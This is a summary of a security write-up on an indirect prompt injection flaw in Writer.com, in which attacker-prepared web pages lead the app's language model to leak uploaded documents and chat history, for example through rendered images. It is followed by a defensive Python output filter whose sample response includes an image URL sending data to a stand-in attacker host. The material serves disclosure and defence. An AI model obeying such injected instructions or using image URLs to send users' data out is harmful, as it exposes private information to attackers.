Writer.com, an application used by enterprises and consumers, has a vulnerability that allows attackers to steal users’ private documents. The vulnerability has not been fixed because Writer.com did not consider it a security issue.

The attack works by manipulating the language model used by the application. Users can upload data files, share links, and ask questions to generate tailored content. Attackers can prepare websites that manipulate the language model into sending private information to the attacker. The stolen data can include uploaded documents, chat history, and other sensitive information. This attack is called indirect prompt injection.

The authors of the article successfully exfiltrated sensitive information to prove the feasibility of the attack. They highlight that rendering an image to exfiltrate data is just one method, and they provide examples of other types of attacks. They mention that similar attacks have been resolved promptly by other companies, and they provide resources for more information on the topic. They also disclose their communication with Writer.com regarding the vulnerability and the lack of response from the company. The article concludes with a disclaimer stating that the content is for research and educational purposes.
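
One defensive check against the image-rendering exfiltration path described above, as an added example (not code from the article or from Writer.com): it filters model output before display so that images load only from allow-listed hosts. It assumes the chat interface renders Markdown or raw HTML images in model output; the allow-listed host and the sample response are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host the application itself serves images from (constructed).
ALLOWED_IMAGE_HOSTS = {"cdn.example-app.test"}

# Markdown inline image: ![alt](url "optional title")
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')
# Raw HTML <img ...> tags, in case the renderer passes HTML through.
HTML_IMAGE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def is_allowed(url: str) -> bool:
    """Allow only https images whose host is on the allow-list."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed URL: treat as untrusted
        return False
    return parts.scheme == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS


def sanitize_model_output(text: str):
    """Return (safe_text, blocked) for one model response."""
    blocked = []

    def replace_md(match):
        alt, url = match.group(1), match.group(2)
        if is_allowed(url):
            return match.group(0)
        blocked.append(url)  # keep for logging and alerting
        return f"[image removed: {alt or 'untitled'}]"

    def replace_html(match):
        blocked.append(match.group(0))
        return "[image removed]"

    text = MD_IMAGE.sub(replace_md, text)
    text = HTML_IMAGE.sub(replace_html, text)  # raw HTML images are never allowed
    return text, blocked


# Constructed model response: one legitimate image, one carrying data in its URL.
SAMPLE = (
    "Here is your summary.\n"
    "![logo](https://cdn.example-app.test/logo.png)\n"
    "![status](https://attacker.example/p.png?d=Q3%20revenue%20draft)\n"
)
```

Reference-style Markdown images and plain links are outside what this filter covers; a blocked URL is also a useful detection signal that a fetched page attempted an injection.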
https://promptarmor.substack.com/p/data-exfiltration-from-writercom